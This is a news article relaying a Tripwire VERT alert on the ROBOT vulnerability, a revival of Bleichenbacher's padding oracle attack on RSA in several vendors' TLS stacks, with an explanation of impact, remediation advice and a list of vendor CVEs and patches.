VERT Threat Alert: Return Of Bleichenbacher’s Oracle Threat (ROBOT)

By   ISBuzz Team
Writer , Information Security Buzz | Dec 13, 2017 04:55 am PST


A team of researchers, including Tripwire VERT’s Craig Young has announced that TLS stacks from at least 8 different vendors are vulnerable to a well-known 19-year-old protocol flaw. The problem is that these implementations allow an attacker to identify whether or not a chosen ciphertext has proper PKCS#1 v1.5 padding when decrypted.

This allows for a classic Bleichenbacher attack on RSA due to the following properties:

  1. RSA is a malleable encryption such that an attacker can “multiply” ciphertext
  2. PKCS#1 v1.5 is not plaintext aware; an attacker can produce valid ciphertext with high probability without knowledge of the plaintext.

In 1998, Daniel Bleichenbacher published an algorithm for exploiting this with an adaptive chosen ciphertext attack. Bleichenbacher argued for a plaintext-aware cryptosystem such as PKCS#1 v2, but TLS designers instead decided to prescribe a series of complicated countermeasures to avoid leaking error details.

The current vulnerabilities are the result of a general failure to properly implement or test these countermeasures in popular products.


Successful exploitation of the vulnerability allows an attacker to perform cryptographic operations using the private key configured on the vulnerable server. In practice, this means that an attacker could decrypt previously recorded sessions established with an RSA key exchange.

An attacker capable of carrying out a signature attack within the duration of a TLS handshake timeout could become a full man-in-the-middle by downgrading connections to use RSA encryption key exchange modes as described in DROWN.


The most complete remediation is to disable RSA encryption-based key exchange modes where possible. This guarantees protection against known and unknown vulnerabilities with a minimal impact on HTTPS client compatibility.

Several vendors have released patches or support notes as indicated in the references section below and tracked on


The underlying vulnerability presents itself with several unique behaviors indicative of how exploitable the system is. Readily exploitable systems are termed as having a “Strong Oracle,” while systems with a “Weak Oracle” will take on average considerably longer to exploit.

Tripwire released coverage for CVE-2017-6168 in ASPL-753 with generic coverage scheduled for ASPL-756.


F5 BIG-IP SSL vulnerability CVE-2017-6168
Citrix TLS Padding Oracle Vulnerability in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway CVE-2017-17382
Radware Security Advisory: Adaptive chosen-ciphertext attack vulnerability CVE-2017-17427
Cisco ACE End-of-Sale and End-of-Life CVE-2017-17428
Bouncy Castle Fix in 1.59 beta 9, Patch / Commit CVE-2017-13098
Erlang OTP, OTP, OTP 20.1.7 CVE-2017-1000385
WolfSSL Github PR / patch CVE-2017-13099
MatrixSSL Changes in 3.8.3 CVE-2016-6883
Java / JSSE Oracle Critical Patch Update Advisory – October 2012 CVE-2012-5081
Notify of
0 Expert Comments
Inline Feedbacks
View all comments

Recent Posts

Would love your thoughts, please comment.x